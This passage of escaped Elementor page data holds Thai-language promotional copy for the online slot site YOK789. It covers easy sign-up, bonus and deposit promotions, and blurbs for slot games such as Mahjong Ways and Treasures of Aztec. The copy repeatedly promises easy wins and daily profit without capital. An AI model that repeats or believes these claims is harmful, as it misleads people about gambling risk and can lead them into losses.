\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 